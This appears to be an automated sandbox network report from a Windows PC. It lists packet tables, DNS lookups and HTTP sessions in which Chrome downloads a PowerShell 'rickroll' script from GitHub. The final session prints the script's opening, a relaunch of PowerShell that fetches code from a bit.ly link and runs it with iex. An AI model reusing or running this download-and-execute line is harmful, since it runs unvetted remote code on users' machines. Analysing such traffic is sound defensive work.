                    Mar 10, 2025 14:15:51.242729902 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:51.242743015 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:51.702377081 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:51.748318911 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:52.336188078 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:52.385211945 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:52.385243893 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:52.386925936 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:52.387037992 CET44349697142.250.185.132192.168.2.6
                    Mar 10, 2025 14:15:52.387093067 CET49697443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:15:53.586168051 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:53.586683989 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:53.586699963 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:53.587866068 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:53.587954998 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:53.589742899 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:53.589742899 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:53.589812994 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:53.632653952 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:53.632671118 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:53.678478956 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.169678926 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.180150986 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.180495977 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.180526018 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.193747997 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.194138050 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.194158077 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.250366926 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.268354893 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.269522905 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.269675970 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.269891024 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.269911051 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.270081043 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.276352882 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.283128977 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.283168077 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.283509016 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.283526897 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.283581018 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.290970087 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.296622038 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.296677113 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.297038078 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.297059059 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.297354937 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.303364038 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.310198069 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.310245037 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.310363054 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.310390949 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.314788103 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.317049026 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366156101 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366199970 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366228104 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366271973 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366297960 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.366317987 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366336107 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.366403103 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:54.366426945 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.370615959 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.372570038 CET49701443192.168.2.6185.199.109.133
                    Mar 10, 2025 14:15:54.372595072 CET44349701185.199.109.133192.168.2.6
                    Mar 10, 2025 14:15:56.118524075 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:15:56.123569012 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:15:56.123653889 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:15:56.123774052 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:15:56.128736973 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:15:56.764697075 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:15:56.795130014 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:15:56.800246000 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:15:56.979547977 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:15:57.023680925 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:15:59.508593082 CET49678443192.168.2.620.42.65.91
                    Mar 10, 2025 14:16:24.406325102 CET5412253192.168.2.61.1.1.1
                    Mar 10, 2025 14:16:24.411365032 CET53541221.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:24.411443949 CET5412253192.168.2.61.1.1.1
                    Mar 10, 2025 14:16:24.411510944 CET5412253192.168.2.61.1.1.1
                    Mar 10, 2025 14:16:24.416497946 CET53541221.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:24.887285948 CET53541221.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:24.888371944 CET5412253192.168.2.61.1.1.1
                    Mar 10, 2025 14:16:24.895474911 CET53541221.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:24.895608902 CET5412253192.168.2.61.1.1.1
                    Mar 10, 2025 14:16:44.603914022 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:44.603976965 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:44.604047060 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:44.604429007 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:44.604446888 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.837131977 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.837713003 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:46.837742090 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.839179993 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.839241982 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:46.841204882 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:46.841272116 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.883970022 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:46.883994102 CET44354127142.250.185.132192.168.2.6
                    Mar 10, 2025 14:16:46.930768013 CET54127443192.168.2.6142.250.185.132
                    Mar 10, 2025 14:16:51.289042950 CET443496802.23.227.215192.168.2.6
                    Mar 10, 2025 14:16:51.289083958 CET443496802.23.227.215192.168.2.6
                    Mar 10, 2025 14:16:51.289155006 CET49680443192.168.2.62.23.227.215
                    Mar 10, 2025 14:16:51.289199114 CET49680443192.168.2.62.23.227.215
                    Mar 10, 2025 14:16:57.476375103 CET4970680192.168.2.6142.250.181.227
                    Mar 10, 2025 14:16:57.481698036 CET8049706142.250.181.227192.168.2.6
                    Mar 10, 2025 14:16:57.481751919 CET4970680192.168.2.6142.250.181.227
                    TimestampSource PortDest PortSource IPDest IP
                    Mar 10, 2025 14:15:40.046168089 CET53599051.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:40.181469917 CET53590011.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:44.374563932 CET53638201.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:44.400516033 CET53602921.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:44.540949106 CET6145653192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:44.541101933 CET5828853192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:44.548090935 CET53582881.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:44.548199892 CET53614561.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:45.313441038 CET6455253192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:45.313601971 CET5535553192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:45.320579052 CET53553551.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:45.321285963 CET53645521.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:51.233833075 CET5686453192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:51.234035969 CET5378453192.168.2.61.1.1.1
                    Mar 10, 2025 14:15:51.241380930 CET53568641.1.1.1192.168.2.6
                    Mar 10, 2025 14:15:51.241398096 CET53537841.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:01.409107924 CET53547811.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:20.362255096 CET53614261.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:24.405852079 CET53590031.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:38.309868097 CET138138192.168.2.6192.168.2.255
                    Mar 10, 2025 14:16:39.832426071 CET53647131.1.1.1192.168.2.6
                    Mar 10, 2025 14:16:45.347459078 CET53516371.1.1.1192.168.2.6
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Mar 10, 2025 14:15:44.540949106 CET192.168.2.61.1.1.10x43ffStandard query (0)www.google.comA (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:44.541101933 CET192.168.2.61.1.1.10x208fStandard query (0)www.google.com65IN (0x0001)false
                    Mar 10, 2025 14:15:45.313441038 CET192.168.2.61.1.1.10x5988Standard query (0)github.comA (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:45.313601971 CET192.168.2.61.1.1.10x5cdeStandard query (0)github.com65IN (0x0001)false
                    Mar 10, 2025 14:15:51.233833075 CET192.168.2.61.1.1.10xe01fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:51.234035969 CET192.168.2.61.1.1.10xd51dStandard query (0)raw.githubusercontent.com65IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Mar 10, 2025 14:15:44.548090935 CET1.1.1.1192.168.2.60x208fNo error (0)www.google.com65IN (0x0001)false
                    Mar 10, 2025 14:15:44.548199892 CET1.1.1.1192.168.2.60x43ffNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:45.321285963 CET1.1.1.1192.168.2.60x5988No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:51.241380930 CET1.1.1.1192.168.2.60xe01fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:51.241380930 CET1.1.1.1192.168.2.60xe01fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:51.241380930 CET1.1.1.1192.168.2.60xe01fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                    Mar 10, 2025 14:15:51.241380930 CET1.1.1.1192.168.2.60xe01fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                    • github.com
                    • www.google.com
                    • raw.githubusercontent.com
                    • c.pki.goog
                    Session IDSource IPSource PortDestination IPDestination Port
                    0192.168.2.649706142.250.181.22780
                    TimestampBytes transferredDirectionData
                    Mar 10, 2025 14:15:56.123774052 CET202OUTGET /r/gsr1.crl HTTP/1.1
                    Cache-Control: max-age = 3000
                    Connection: Keep-Alive
                    Accept: */*
                    If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: c.pki.goog
                    Mar 10, 2025 14:15:56.764697075 CET223INHTTP/1.1 304 Not Modified
                    Date: Mon, 10 Mar 2025 12:53:42 GMT
                    Expires: Mon, 10 Mar 2025 13:43:42 GMT
                    Age: 1334
                    Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                    Cache-Control: public, max-age=3000
                    Vary: Accept-Encoding
                    Mar 10, 2025 14:15:56.795130014 CET200OUTGET /r/r4.crl HTTP/1.1
                    Cache-Control: max-age = 3000
                    Connection: Keep-Alive
                    Accept: */*
                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                    User-Agent: Microsoft-CryptoAPI/10.0
                    Host: c.pki.goog
                    Mar 10, 2025 14:15:56.979547977 CET223INHTTP/1.1 304 Not Modified
                    Date: Mon, 10 Mar 2025 12:53:41 GMT
                    Expires: Mon, 10 Mar 2025 13:43:41 GMT
                    Age: 1335
                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                    Cache-Control: public, max-age=3000
                    Vary: Accept-Encoding


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649700140.82.121.44435460C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-03-10 13:15:47 UTC693OUTGET /fenwikk/rickroll/raw/main/roll.p1 HTTP/1.1
                    Host: github.com
                    Connection: keep-alive
                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br, zstd
                    Accept-Language: en-US,en;q=0.9
                    2025-03-10 13:15:48 UTC567INHTTP/1.1 301 Moved Permanently
                    Server: GitHub.com
                    Date: Mon, 10 Mar 2025 13:15:47 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 0
                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                    Location: https://github.com/youknowedo/rickroll/raw/main/roll.p1
                    Cache-Control: no-cache
                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                    X-Frame-Options: deny
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 0
                    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                    2025-03-10 13:15:48 UTC3408INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73
                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649699140.82.121.44435460C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-03-10 13:15:48 UTC696OUTGET /youknowedo/rickroll/raw/main/roll.p1 HTTP/1.1
                    Host: github.com
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br, zstd
                    Accept-Language: en-US,en;q=0.9
                    2025-03-10 13:15:51 UTC566INHTTP/1.1 302 Found
                    Server: GitHub.com
                    Date: Mon, 10 Mar 2025 13:15:50 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 0
                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                    Access-Control-Allow-Origin:
                    Location: https://raw.githubusercontent.com/youknowedo/rickroll/main/roll.p1
                    Cache-Control: no-cache
                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                    X-Frame-Options: deny
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 0
                    Referrer-Policy: no-referrer-when-downgrade
                    2025-03-10 13:15:51 UTC3409INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73
                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649697142.250.185.1324435460C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-03-10 13:15:51 UTC487OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    X-Client-Data: CO6MywE=
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br, zstd
                    Accept-Language: en-US,en;q=0.9
                    2025-03-10 13:15:52 UTC1303INHTTP/1.1 200 OK
                    Date: Mon, 10 Mar 2025 13:15:51 GMT
                    Pragma: no-cache
                    Expires: -1
                    Cache-Control: no-cache, must-revalidate
                    Content-Type: text/javascript; charset=UTF-8
                    Strict-Transport-Security: max-age=31536000
                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-tMVuOOgfqF_F6Jon42I5gg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                    Accept-CH: Downlink
                    Accept-CH: RTT
                    Accept-CH: Sec-CH-UA-Form-Factors
                    Accept-CH: Sec-CH-UA-Platform
                    Accept-CH: Sec-CH-UA-Platform-Version
                    Accept-CH: Sec-CH-UA-Full-Version
                    Accept-CH: Sec-CH-UA-Arch
                    Accept-CH: Sec-CH-UA-Model
                    Accept-CH: Sec-CH-UA-Bitness
                    Accept-CH: Sec-CH-UA-Full-Version-List
                    Accept-CH: Sec-CH-UA-WoW64
                    Permissions-Policy: unload=()
                    Content-Disposition: attachment; filename="f.txt"
                    Server: gws
                    X-XSS-Protection: 0
                    X-Frame-Options: SAMEORIGIN
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    2025-03-10 13:15:52 UTC39INData Raw: 33 36 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 6f 6d 65 6c 61 6e 64 20 73 65 63 75 72 69 74 79 20 74 73 61 22 2c
                    Data Ascii: 36c)]}'["",["homeland security tsa",
                    2025-03-10 13:15:52 UTC844INData Raw: 22 63 6f 6c 6c 65 67 65 20 62 61 73 6b 65 74 62 61 6c 6c 20 74 6f 75 72 6e 61 6d 65 6e 74 20 62 72 61 63 6b 65 74 22 2c 22 72 6f 62 69 6e 73 6f 6e 20 72 38 38 20 68 65 6c 69 63 6f 70 74 65 72 22 2c 22 6d 61 72 76 65 6c 20 64 61 72 65 64 65 76 69 6c 20 62 6f 72 6e 20 61 67 61 69 6e 22 2c 22 6d 6f 6e 73 74 65 72 20 68 75 6e 74 65 72 20 77 69 6c 64 73 20 74 69 74 6c 65 20 75 70 64 61 74 65 22 2c 22 63 61 74 20 66 6f 6f 64 20 72 65 63 61 6c 6c 65 64 22 2c 22 74 6a 20 62 61 69 6c 65 79 20 74 65 78 61 73 20 6d 6f 74 6f 72 70 6c 65 78 22 2c 22 71 75 61 6e 74 75 6d 20 73 75 70 65 72 73 6f 6c 69 64 20 6c 69 67 68 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74
                    Data Ascii: "college basketball tournament bracket","robinson r88 helicopter","marvel daredevil born again","monster hunter wilds title update","cat food recalled","tj bailey texas motorplex","quantum supersolid light"],["","","","","","","",""],[],{"google:clientdat
                    2025-03-10 13:15:52 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.649701185.199.109.1334435460C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2025-03-10 13:15:53 UTC707OUTGET /youknowedo/rickroll/main/roll.p1 HTTP/1.1
                    Host: raw.githubusercontent.com
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br, zstd
                    Accept-Language: en-US,en;q=0.9
                    2025-03-10 13:15:54 UTC893INHTTP/1.1 200 OK
                    Connection: close
                    Content-Length: 37184
                    Cache-Control: max-age=300
                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                    Content-Type: text/plain; charset=utf-8
                    ETag: "ca8a0781a4ba81897b2255e9ace440e10bb0ca5acecf0130adc9d72564a9913a"
                    Strict-Transport-Security: max-age=31536000
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: deny
                    X-XSS-Protection: 1; mode=block
                    X-GitHub-Request-Id: B900:170C:934355:BC4499:67CEE606
                    Accept-Ranges: bytes
                    Date: Mon, 10 Mar 2025 13:15:53 GMT
                    Via: 1.1 varnish
                    X-Served-By: cache-msp11841-MSP
                    X-Cache: MISS
                    X-Cache-Hits: 0
                    X-Timer: S1741612554.866677,VS0,VE123
                    Vary: Authorization,Accept-Encoding,Origin
                    Access-Control-Allow-Origin: *
                    Cross-Origin-Resource-Policy: cross-origin
                    X-Fastly-Request-ID: 55a97972ae6913775e5ffb4a48891b8456021b44
                    Expires: Mon, 10 Mar 2025 13:20:53 GMT
                    Source-Age: 0
                    2025-03-10 13:15:54 UTC1378INData Raw: 69 66 28 24 68 6f 73 74 2e 4e 61 6d 65 20 2d 6e 65 20 22 43 6f 6e 73 6f 6c 65 48 6f 73 74 22 29 0a 7b 0a 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 27 2d 6e 6f 70 72 6f 66 69 6c 65 20 2d 6e 6f 65 78 69 74 20 2d 63 6f 6d 6d 61 6e 64 20 69 65 78 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 28 27 27 68 74 74 70 3a 2f 2f 62 69 74 2e 6c 79 2f 72 52 70 77 53 68 27 27 29 27 0a 20 20 20 20 72 65 74 75 72 6e 0a 7d 0a 0a 24 64 61 74 61 20 3d 20 27 48 34 73 49 41 41 41 41 41 41 41 45 41 4f 32 39 42 32 41 63 53 5a 59 6c 4a 69 39 74 79 6e 74 2f 53 76 56 4b 31 2b 42 30 6f 51 69 41 59 42 4d 6b 32 4a 42 41
                    Data Ascii: if($host.Name -ne "ConsoleHost"){ Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''http://bit.ly/rRpwSh'')' return}$data = 'H4sIAAAAAAAEAO29B2AcSZYlJi9tynt/SvVK1+B0oQiAYBMk2JBA
